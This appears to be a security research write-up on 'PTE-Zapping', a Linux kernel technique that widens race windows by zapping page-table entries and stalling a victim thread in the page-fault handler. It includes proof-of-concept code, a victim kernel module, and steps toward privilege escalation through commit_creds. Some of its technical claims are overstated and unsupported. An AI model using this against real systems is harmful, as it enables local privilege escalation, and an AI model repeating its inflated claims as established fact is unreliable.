Published on March 30, 2026
PTE-Zapping: Exploiting Compositional Vulnerabilities in Linux Kernel Memory Management
Correctness does not imply legitimacy
In this research, we operate under the rigorous assumption that the architectural designs of Page Table Entries (PTE), Inter-Processor Interrupts (IPI), Translation Lookaside Buffers (TLB), and the Memory Management Unit (MMU) are formally correct. The objective is not to refute the integrity of these individual components, but to demonstrate a Compositional Vulnerability that emerges from their functional integration. By treating these systems as a unified state machine, we identify a latent Exploit Gradient that allows an adversary to transform stochastic race conditions into deterministic, controllable execution flows.
1- Introduction
The technique, PTE-Zapping: Deterministic State-Stalling via IPI Bypass, targets the "blind spots" in cross-thread synchronization. While the 4-level page walk, VA/PA mapping, and memory locking mechanisms may each satisfy their local invariants, their concurrent interaction lacks a global synchronization constant. This architectural overlap permits the programmatic decoupling of memory states. By inducing a controlled IPI-Blindness, we demonstrate that a victim thread (Core 0) can be anchored within a hardware exception path (Page Fault) while an attacker thread (Core 1) executes unauthorized state mutations. This research demonstrates that systemic security is not the sum of its correct parts but a product of the compositional constraints between them, constraints that are often missing.
2- Memory Subsystem Architecture
To establish the framework for PTE-Zapping, we must first define the operational invariants of the paging subsystem. The architecture relies on the Page Table Entry (PTE) as the fundamental unit of enforcement within the Memory Management Unit (MMU).
2.1- The Page Table Entry (PTE) Definition
The PTE is a structured control object within the hierarchical page table system. Its primary obligation is to maintain a verifiable link between a Virtual Address (VA) and a Physical Address (PA) while enforcing hardware-level access constraints.
2.2- Core Control Bits & Adversarial Relevance
- P (Present) Bit [Bit 0]: Function: Indicates whether the page resides in physical RAM. If P=0, the MMU raises a Page Fault (#PF).
Zapping Role: This is the primary trigger for our primitive. By programmatically clearing this bit (Zapping), we force the victim thread into the kernel's exception-handling logic, creating the initial execution stall.
- R/W [Bit 1] & U/S [Bit 2] (Protection Bits): Function: Define the Read/Write and User/Supervisor access levels.
Adversarial Use: These are the target of our state mutation. Once the stall is achieved, we transition these bits to an illegal state (e.g., elevating User to Supervisor or Read to Write).
- A (Accessed) [Bit 5] & D (Dirty) [Bit 6] Bits: Function: Hardware-managed indicators of page use and modification.
Relevance: We monitor these bits to verify "State Anchoring", ensuring the victim has reached or modified the target page before we initiate the race.
- PCD (Page Cache Disable) [Bit 4]: Function: Disables caching for the page, so accesses go directly to physical RAM.
Operational Requirement: For Cross-Thread Violations, we disable caching so that every memory reference (such as fetching an inode or cred structure) is a "Fresh Fetch" from RAM, eliminating cache-coherency delays that might mask the vulnerability.
- PWT (Page Write-Through) [Bit 3]: Function: Selects write-through caching, so every write updates both the cache and physical memory.
Relevance: Ensures that our state mutations on Core 1 are immediately visible in the page's physical backing before the victim on Core 0 resumes.
- G (Global) [Bit 8]: Function: Keeps the TLB entry from being invalidated on a CR3 reload (e.g., a context switch) when global pages are enabled (CR4.PGE = 1).
Adversarial Leverage: We manipulate this bit to selectively persist stale mappings in the TLB, facilitating the IPI-Bypass by maintaining a local "false reality" on the target core.
- NX (No-Execute) [Bit 63]: Function: Prevents instruction fetches from the page (when EFER.NXE = 1).
Adversarial Setup: We explicitly disable this invariant in our research scenarios to allow arbitrary code execution once PTE-Zapping provides a stable write primitive.
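The control bits above can be made concrete with a small decoder. This is a sketch assuming the standard x86-64 layout of a 4 KiB page-table entry (Intel SDM, 4-level paging); the helper names `pte_test`, `pte_phys` and `pte_zap` are hypothetical, and `pte_zap` only models clearing P on a 64-bit value, not a change to live page tables.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* x86-64 PTE flag positions for a 4 KiB page (4-level paging). */
enum pte_bit {
    PTE_P   = 0,   /* Present */
    PTE_RW  = 1,   /* Read/Write */
    PTE_US  = 2,   /* User/Supervisor */
    PTE_PWT = 3,   /* Page Write-Through */
    PTE_PCD = 4,   /* Page Cache Disable */
    PTE_A   = 5,   /* Accessed */
    PTE_D   = 6,   /* Dirty */
    PTE_G   = 8,   /* Global */
    PTE_NX  = 63   /* No-Execute (honoured when EFER.NXE = 1) */
};

/* Physical frame address field of a 4 KiB PTE: bits 12..51. */
#define PTE_ADDR_MASK 0x000FFFFFFFFFF000ULL

/* True if the given flag bit is set in the entry. */
static bool pte_test(uint64_t pte, enum pte_bit bit)
{
    assert((unsigned)bit < 64);
    return (pte >> bit) & 1u;
}

/* Physical address of the 4 KiB frame the entry points to. */
static uint64_t pte_phys(uint64_t pte)
{
    return pte & PTE_ADDR_MASK;
}

/* Toy "zap": the same entry with P cleared; all other fields untouched. */
static uint64_t pte_zap(uint64_t pte)
{
    return pte & ~(1ULL << PTE_P);
}
```

For example, an entry with P, R/W, U/S and NX set that points at frame 0x123456000 still reports that frame after `pte_zap`, but no longer reports P.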
2.3- Structural Invariants of the 4-Level Page Walk
The mapping process follows a non-negotiable traversal: CR3 -> PML4 -> PDPT -> PD -> PT, where the selected PT entry is the PTE. The Compositional Vulnerability arises because each level assumes that the state of the previous level remains stable throughout the walk. We exploit the absence of a "Locking Constant" that covers the entire duration from the start of the walk to the actual data access.
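The walk consumes the virtual address nine bits per level. A minimal sketch, assuming 4-level paging with 4 KiB pages and lower-half (user) addresses; `va_split` and `va_join` are hypothetical helper names:

```c
#include <assert.h>
#include <stdint.h>

/* Index used at each level of a 4-level x86-64 walk, plus the page offset. */
struct walk_idx {
    unsigned pml4, pdpt, pd, pt;   /* 9 bits each: 0..511 */
    unsigned offset;               /* 12 bits: 0..4095 */
};

/* Split a 48-bit virtual address into its walk indices. */
static struct walk_idx va_split(uint64_t va)
{
    struct walk_idx w = {
        .pml4   = (unsigned)((va >> 39) & 0x1FF),
        .pdpt   = (unsigned)((va >> 30) & 0x1FF),
        .pd     = (unsigned)((va >> 21) & 0x1FF),
        .pt     = (unsigned)((va >> 12) & 0x1FF),
        .offset = (unsigned)(va & 0xFFF),
    };
    return w;
}

/* Inverse of va_split for lower-half addresses (PML4 index < 256);
 * upper-half addresses would additionally need bit 47 sign-extended. */
static uint64_t va_join(struct walk_idx w)
{
    assert(w.pml4 < 256 && w.pdpt < 512 && w.pd < 512 && w.pt < 512);
    assert(w.offset < 4096);
    return ((uint64_t)w.pml4 << 39) | ((uint64_t)w.pdpt << 30) |
           ((uint64_t)w.pd << 21) | ((uint64_t)w.pt << 12) | w.offset;
}
```

Each of the four indices selects one entry in a 512-entry table; only the last one selects the PTE that Zapping targets.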
2.4- Inter-Processor Interrupts (IPI) & TLB Shootdown
In a multi-core architecture, the IPI serves as the hardware-level signaling mechanism that allows one CPU core to trigger an action on another. Its most critical obligation in memory management is the TLB Shootdown.
A. The Design Obligation of TLB Shootdown
When Core 1 modifies a PTE (e.g., changing a page from Present to Absent during Zapping), any copy of that translation cached in Core 0's TLB (Translation Lookaside Buffer) becomes "Stale" (outdated). To prevent an Illegal State, the kernel must:
- Issue an IPI to every other core that may cache the mapping.
- Interrupt the remote cores' current execution.
- Execute a TLB flush on each of them (e.g., invlpg or reloading CR3).
- Wait for the remote cores to acknowledge the flush before treating the old mapping as gone.
B. The Vulnerability Window (The Gap)
The Compositional Vulnerability arises because the IPI is Asynchronous by nature. There is a measurable temporal gap between the moment Core 1 updates the PTE in RAM and the moment Core 0 actually receives and processes the IPI to invalidate its local TLB.
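The window can be illustrated with a deliberately simplified model. This is a toy under stated assumptions: one PTE held in a variable that stands in for RAM, a one-entry TLB per core, and a shootdown modelled as clearing every core's entry at once. All names are hypothetical and nothing here touches real page tables. In line with x86 behaviour, a not-present entry is never cached.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define NCORES      2
#define PTE_PRESENT 0x1ULL

/* One cached translation per core (toy model, not kernel code). */
struct toy_tlb {
    bool     valid;
    uint64_t cached_pte;
};

static uint64_t ram_pte = 0x1000ULL | PTE_PRESENT;  /* the PTE "in RAM" */
static struct toy_tlb tlb[NCORES];

/* A TLB hit returns the cached copy; a miss walks "RAM".
 * Returns false where real hardware would raise #PF. */
static bool toy_translate(int core, uint64_t *out)
{
    assert(core >= 0 && core < NCORES);
    if (!tlb[core].valid) {
        if (!(ram_pte & PTE_PRESENT))
            return false;               /* not present: fault, nothing cached */
        tlb[core].valid = true;
        tlb[core].cached_pte = ram_pte;
    }
    *out = tlb[core].cached_pte;
    return true;
}

/* Step 1: the PTE is cleared in memory only. */
static void toy_zap_pte(void)
{
    ram_pte = 0;
}

/* Step 2: the shootdown invalidates every core's cached entry. */
static void toy_shootdown(void)
{
    for (int i = 0; i < NCORES; i++)
        tlb[i].valid = false;
}
```

In the model, a core that had cached the translation keeps resolving the old mapping after `toy_zap_pte()` until `toy_shootdown()` runs, while a core with nothing cached already faults.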
C. IPI-Blindness via TLB Flooding
This research introduces the concept of IPI-Blindness. By saturating Core 0 with high-frequency memory accesses (TLB Flooding), we create "Pipeline Noise". This does not stop the IPI; the intent is to delay the point at which the core transitions to the interrupt handler.
Adversarial Gradient: We exploit this delay to ensure that Core 0 continues to use the Stale PTE (which it thinks is still valid) while Core 1 has already "Zapped" the underlying physical state.
3- The Zapping Primitive & Deterministic State-Stalling
This chapter details the operational execution of the PTE-Zapping technique. The objective is to move from the theoretical "Compositional Vulnerability" to a concrete Exploitation Primitive that forces a controlled stall in the victim's execution flow.
3.1- The Zapping Mechanism: De-synchronizing VA from PA
The "Zapping" phase is the intentional disruption of the Architectural Invariant that ensures a Virtual Address (VA) points to a valid Physical Address (PA).
- The Procedure: Using memory-management syscalls (specifically madvise with MADV_DONTNEED) or direct kernel-mode PTE manipulation, we clear the target page's PTE, and with it the Present Bit (Bit 0); MADV_DONTNEED zaps the entire entry rather than only the P bit.
- The Result: The Page Table Entry is moved into an Invalid State. However, due to the asynchronous nature of TLB shootdowns, the victim core may still hold a "Ghost Mapping" in its local TLB.
- Adversarial Objective: We aim to keep the victim core "blind" to this update until the exact moment of conflict, ensuring that the next memory access triggers a Hardware Exception (#PF) instead of a standard memory fetch.
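```c
/* Raw madvise(address, ALLOC_SIZE, MADV_DONTNEED) on x86-64. */
asm volatile
(
    "movq $0x1C, %%rax\n\t"   /* __NR_madvise (28) */
    "movq %0, %%rdi\n\t"      /* start address */
    "movq %1, %%rsi\n\t"      /* length */
    "movq $4, %%rdx\n\t"      /* advice: MADV_DONTNEED (4) */
    "syscall\n\t"
    :
    : "r" ((unsigned long)address),
      "r" ((unsigned long)ALLOC_SIZE)
    : "rax", "rdi", "rsi", "rdx",
      "rcx", "r11",           /* clobbered by the syscall instruction */
      "memory"
);
```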
3.2- Execution Anchoring: The Page-Fault Trap
The core innovation of PTE-Zapping is Execution Anchoring. By invalidating the PTE, we force the victim thread (Core 0) to exit its high-speed execution path and enter the Kernel’s Page Fault Handler.
- The Trap: When the victim thread attempts to access the "Zapped" address, the MMU fails the translation and raises a Page Fault.
- The Transition: The CPU switches to supervisor mode (ring 0) to resolve the fault. This transition is not instantaneous; the handler runs nontrivial software logic:
- Looking up the faulting vm_area_struct.
- Allocating or re-mapping physical pages.
- Acquiring locks (e.g., mmap_lock).
- The Anchor: During this period, the victim thread is effectively Anchored (Frozen). Its execution cannot proceed until the kernel "fixes" the memory state.
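```c
/* Read and write back one byte at the zapped address; once no valid
 * translation remains, this access raises #PF. */
*(volatile char *)u_addr = *(volatile char *)u_addr;
```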
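A rough way to observe the cost of the trapping access is to time the same read-and-write-back with and without a preceding MADV_DONTNEED. This is a sketch assuming Linux, glibc and `CLOCK_MONOTONIC`; the function names are hypothetical, and single-shot timings are noisy, so only repeated measurements are meaningful.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stdint.h>
#include <sys/mman.h>
#include <time.h>
#include <unistd.h>

static int64_t now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (int64_t)ts.tv_sec * 1000000000LL + ts.tv_nsec;
}

/* Times one read-and-write-back of the first byte of a private anonymous
 * page. With zap != 0 the page is dropped first, so the access takes a
 * page fault. Returns elapsed nanoseconds, or -1 on error. */
static int64_t access_cost_ns(int zap)
{
    long page = sysconf(_SC_PAGESIZE);
    assert(page > 0);

    void *m = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (m == MAP_FAILED)
        return -1;
    volatile char *p = m;

    p[0] = 1;                                  /* populate the PTE first */
    if (zap && madvise(m, (size_t)page, MADV_DONTNEED) != 0) {
        munmap(m, (size_t)page);
        return -1;
    }

    int64_t t0 = now_ns();
    p[0] = p[0];                               /* same access pattern as above */
    int64_t t1 = now_ns();

    munmap(m, (size_t)page);
    return t1 - t0;
}
```

The zapped case includes allocating and zeroing a fresh page, so it measures a complete minor fault rather than the stall in isolation.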
3.3- Temporal Window Expansion (The Stall)
A standard Page Fault is resolved in microseconds. To achieve a Deterministic Race, we must programmatically expand this temporal window.
- IPI-Bypass/Blindness: By implementing TLB Flooding on the victim core, we delay the processing of the IPI shootdown. This ensures that the victim remains in an inconsistent state for a longer duration.
- Resource Contention: By creating heavy memory pressure or lock contention on the kernel's memory management structures, we force the Page Fault Handler to wait.
- Resultant Gap: This transforms a nanosecond-scale race window into a Millisecond-scale Stall. This expansion provides the attacker (Core 1) with more than enough time to perform "Out-of-band" mutations (e.g., swapping an object, corrupting a refcount, or re-allocating memory) before the victim resumes.
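```c
void
tlb_flood
(
    void *addr
)
{
    /* Intended to delay IPI (TLB shootdown) handling on this core (see 3.3).
     * Loops forever, alternately loading from addr and addr + 4096 (two
     * adjacent pages), with a locked no-op add on the stack as a full barrier.
     * addr is modified inside the asm, so it is an in/out ("+r") operand. */
    __asm__ volatile
    (
        "1:\n\t"
        "movq (%0), %%rax\n\t"
        "add $4096, %0\n\t"
        "movq (%0), %%rbx\n\t"
        "sub $4096, %0\n\t"
        "lock addl $0, (%%rsp)\n\t"
        "jmp 1b\n\t"
        : "+r" (addr)
        :
        : "rax", "rbx", "cc", "memory"
    );
}
```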
3.4- Summary of the Primitive Flow
- Zapping: Invalidate the target PTE while the victim is approaching the critical path.
- Flooding: Saturate the TLB to mask the IPI update.
- Trapping: Victim hits the #PF and enters the "Anchor" state.
- Mutating: Attacker modifies the physical backing of the memory.
- Resuming: Kernel resolves the fault, and the victim resumes execution—now operating on Corrupted/Swapped State.
4- Implementation Framework & Environment
To ensure the reliability of the IPI-Bypass and the stability of the Temporal Anchor, the research was validated under a strictly controlled environment.
4.1- Experimental Environment
- Target Kernel: 6.17.0-19-generic (Ubuntu generic kernel).
- Architecture: x86_64 (Multi-core SMP enabled).
- Compiler Toolchain: GCC 13.3.0 (Build: Ubuntu 13.3.0-6ubuntu2~24.04.1).
- Memory Management Protections:
- KPTI (Kernel Page Table Isolation): Enabled. (Verified to ensure isolation does not mitigate the synchronization gap).
- SMAP/SMEP: Active. (The primitive operates via legitimate kernel exception paths, rendering hardware-level access prevention neutral during the stall).
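Whether these protections are active can be checked from user space: on x86 Linux, the flags line of /proc/cpuinfo lists `smap` and `smep`, and `pti` when kernel page table isolation is in use. The helper below is a sketch; its name is hypothetical, and it only inspects the first CPU's flags line.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if `flag` appears as a whole word on the first "flags" line of
 * /proc/cpuinfo, 0 if it does not, and -1 if the file or line is missing. */
static int cpuinfo_has_flag(const char *flag)
{
    assert(flag && *flag);
    FILE *f = fopen("/proc/cpuinfo", "r");
    if (!f)
        return -1;

    char line[8192];
    int result = -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "flags", 5) != 0)
            continue;                       /* not the x86 flags line */
        char *colon = strchr(line, ':');
        if (!colon)
            break;
        result = 0;
        for (char *tok = strtok(colon + 1, " \t\n"); tok;
             tok = strtok(NULL, " \t\n")) {
            if (strcmp(tok, flag) == 0) {
                result = 1;
                break;
            }
        }
        break;                              /* only the first CPU is checked */
    }
    fclose(f);
    return result;
}
```

For example, `cpuinfo_has_flag("smap")`, `cpuinfo_has_flag("smep")` and `cpuinfo_has_flag("pti")` each return 1 on a system matching the configuration above.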
4.2- Technical Note: Primitive Chaining & Attack Surface
The PTE-Zapping technique serves as a "Temporal Enabler" rather than a standalone code-execution exploit:
- Data-Only Exploitation: Sufficient for LPE (e.g., cred manipulation) without additional bypasses, as it does not violate Control-Flow Integrity (CFI).
- Control-Flow Hijacking: Must be chained with secondary bypasses for SMAP/SMEP, Retpoline, and KASLR (e.g., via EntryBleed or ROP/JOP chains).
5- PoC Architecture & Workflow
The Proof-of-Concept is designed as a modular framework to isolate the kernel-level "Victim" logic from the user-space "Attacker" primitive.
5.1- Project Directory Structure
zapping_pte/
├── headers/
│ ├── injection_ioctl.h # Memory allocation sizes and SET_TRAP_ADDRESS IOCTL
│ └── state_machine.h # Error codes and THP (Transparent Huge Pages) state control
├── kernel_module.c # The "Victim" subsystem (handles #PF anchoring)
├── source_code.c # User-space Exploit (Zapping logic & TLB Flooding)
├── argparse.c / .h # Command-line interface for symbol passing
└── Makefile # Automated environment setup and symbol resolution
5.2- Critical Components
- state_machine.h: Enforces memory-layout constraints (e.g., THP_DISABLE) so that the victim page is not coalesced into a huge page, preserving the full 4-level page walk down to a PTE.
- injection_ioctl.h: Establishes the SET_TRAP_ADDRESS command to pin the victim thread to the target memory region.
- Makefile (Automation):
- Symbol Resolution: Dynamically extracts commit_creds and prepare_kernel_cred from /proc/kallsyms.
- Environment Prep: Automatically handles kptr_restrict and device permissions (chmod 666).
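The contents of state_machine.h are not reproduced here. As an assumption about how a THP_DISABLE-style constraint could be applied from user space, Linux provides a per-process switch through `prctl(PR_SET_THP_DISABLE)`; a minimal sketch, with `disable_thp` as a hypothetical helper name:

```c
#include <assert.h>
#include <sys/prctl.h>

/* Disable Transparent Huge Pages for the calling process so anonymous
 * memory stays backed by 4 KiB pages, each mapped by its own PTE.
 * Returns 0 on success, -1 on error (errno is set). */
static int disable_thp(void)
{
    if (prctl(PR_SET_THP_DISABLE, 1UL, 0UL, 0UL, 0UL) != 0)
        return -1;

    /* Read the setting back; PR_GET_THP_DISABLE is non-zero once set. */
    int state = prctl(PR_GET_THP_DISABLE, 0UL, 0UL, 0UL, 0UL);
    assert(state > 0);
    return 0;
}
```

Calling it once at start-up, before the victim range is allocated, ensures the range is never collapsed into a 2 MiB mapping.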
5.3- Execution Workflow
To replicate the research findings:
```sh
make
make run
```
6- The Exploitation Flow & Cross-Thread Violation Surface
This chapter defines the operational objective of the PTE-Zapping technique. Rather than a standalone vulnerability, this method serves as an Exploitation Framework designed to create a deterministic "Temporal Gap" between two execution contexts (Core 0 and Core 1). This gap allows for a high-precision Cross-Thread Violation within the Linux Kernel’s subsystems (e.g., File Systems, Device Drivers).
6.1- Defining the Attack Surface
The primitive operates at the intersection of the Hardware MMU and the Kernel's Memory Management (MM) subsystem. By creating a controlled stall, we transform standard kernel operations into vulnerable race conditions.
- Target Scope: Kernel subsystems and modules (e.g., exFAT, ext4, custom drivers).
- Violation Type: Cross-thread data corruption (e.g., modifying a cred structure, refcount manipulation, or inducing a Use-After-Free via unlinked objects).
6.2- The Victim Logic: Kernel Module Integration
To demonstrate the attack, we utilize a companion Kernel Module (poc_device). This module acts as the "Victim Subsystem" that the attacker thread will manipulate.
Implementation (The Trap Handler): The module exposes an ioctl interface that allows us to set the "Trap Address" and force its PTE state to be ready for zapping.
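```c
static
long
ioctl_handler
(
    struct file* file,
    unsigned int cmd,
    unsigned long arg
)
{
    unsigned long target;

    if (cmd != SET_TRAP_ADDRESS)
        return -ENOTTY;         /* unknown command */
    if (!arg)
        return -EINVAL;         /* a trap address is required */

    /* Publish the trap address for the kernel threads; keep a local copy so
     * a concurrent SET_TRAP_ADDRESS cannot change it before the call below. */
    spin_lock(&address_lock);
    addressT = arg;
    target = addressT;
    spin_unlock(&address_lock);

    /* Prepare the PTE backing the trap address for zapping. */
    return force_pte_state(target);
}
```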
6.3- Establishing the Cross-Thread Anchor
The power of this technique lies in pinning threads to specific cores so that the TLB shootdown (IPI) can be reliably masked. Our module initializes two kernel threads (kt0 and kt1) bound to separate CPUs (0 and 1).
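```c
/* kthread_bind() must be called while the new thread is still stopped,
 * i.e. between kthread_create() and wake_up_process(). */
kt0 = kthread_create(trigger_cpu_0, NULL, "thread_0");
if (!IS_ERR(kt0))
{
    kthread_bind(kt0, 0);   /* victim: CPU 0 */
    wake_up_process(kt0);
}
kt1 = kthread_create(trigger_cpu_1, NULL, "thread_1");
if (!IS_ERR(kt1))
{
    kthread_bind(kt1, 1);   /* attacker side: CPU 1 */
    wake_up_process(kt1);
}
```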
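For the user-space side of the PoC, the analogue of `kthread_bind()` is CPU affinity. A sketch using `sched_setaffinity(2)` with glibc and `_GNU_SOURCE`; `pin_to_cpu` is a hypothetical helper, not part of the PoC sources.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* Restrict the calling thread to a single logical CPU.
 * Returns 0 on success, -1 on error (errno is set). */
static int pin_to_cpu(int cpu)
{
    assert(cpu >= 0 && cpu < CPU_SETSIZE);
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof set, &set);   /* 0 = calling thread */
}
```

Calling `pin_to_cpu(0)` in the thread that performs the victim access and `pin_to_cpu(1)` in the thread that zaps mirrors the kt0/kt1 placement; `sched_getcpu()` can confirm where each thread actually runs.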
6.4- The Window of Opportunity: kernel_write Race
Inside the victim thread (trigger_cpu_0), we create an I/O operation that becomes the "Anchor Point." When the attacker zaps the address used by kernel_write, the execution is suspended inside the kernel's fault handler.
```c
static int trigger_cpu_0(void *data)
{
    struct file* filp;
    loff_t offset = 0;
    char k_buf[32] = "trigger data";

    filp = filp_open(PATH_FILE, O_RDWR | O_CREAT, 0644);
    if (IS_ERR(filp))
    {
        return (int)PTR_ERR(filp);
    }
    while (!kthread_should_stop())
    {
        /* Idle until user space registers a trap address (SET_TRAP_ADDRESS). */
        if (!READ_ONCE(addressT))
        {
            usleep_range(1000, 2000);
            continue;
        }
        // Page Fault injection point
        kernel_write(filp, k_buf, sizeof(k_buf), &offset);
        /* Keep the file small by wrapping the write offset. */
        if (offset > 100000)
        {
            offset = 0;
        }
        cpu_relax();
    }
    filp_close(filp, NULL);
    return 0;
}
```
6.5- Winning the Race: From Stall to Mutation
While Core 0 is trapped in the Page Fault handler (anchored), the user-space attacker or Core 1 has the "freedom" to modify the physical state. In our LPE scenario, we resolve the kernel symbols for credential management:
```c
prepare_creds_ptr = (void*)lookup("prepare_kernel_cred");
commit_creds_ptr = (void*)lookup("commit_creds");
```
Summary of the Flow:
- Registration: User-space sends the target address via SET_TRAP_ADDRESS.
- Anchoring: Core 0 enters kernel_write and hits the Zapped PTE, triggering a stall.
- Mutation: Core 1 (Attacker) modifies the sensitive structure (e.g., cred) or swaps the physical page backing.
- Resumption: The Kernel resolves the fault, and Core 0 continues execution, unaware that it is now operating on a "Corrupted" or "Elevated" state.
7- Conclusion & Future Impact
This research has demonstrated that the PTE-Zapping technique is not merely a theoretical curiosity but a potent Architectural Exploit Primitive. By abusing the inherent latency in TLB shootdowns and the deterministic nature of Page Fault handling, we have successfully created a "Temporal Anchor" within the Linux Kernel.
7.1- Key Findings
- Determinism over Randomness: Unlike traditional race conditions that rely on luck, PTE-Zapping allows an attacker to "freeze" a victim thread (Core 0) at a specific instruction (e.g., inside kernel_write) by manipulating the underlying Page Table Entry.
- The Power of the Anchor: We proved that a sub-microsecond race window can be expanded into a millisecond-scale stall through TLB Flooding and Resource Contention.
- Cross-Thread Violation: By utilizing a custom Kernel Module, we showed that any subsystem (File Systems, Network Stacks, Device Drivers) that interacts with user-space memory is potentially vulnerable to this "Out-of-band" state mutation.
7.2- Security Implications
The vulnerability lies in the Compositional Failure between Hardware (MMU) and Software (Kernel Fault Handlers). Current mitigations (like KPTI or SMAP) do not address this, as the attack leverages legitimate architectural features (IPI and #PF).
7.3- Final Summary
The PTE-Zapping primitive introduces a new class of State-Stalling Attacks. It provides the adversary with a "surgical" window to perform memory corruption, credential swapping, or reference count manipulation with high reliability. As long as the gap between PTE invalidation and TLB synchronization exists, the "Ghost Mapping" remains a viable surface for exploitation.
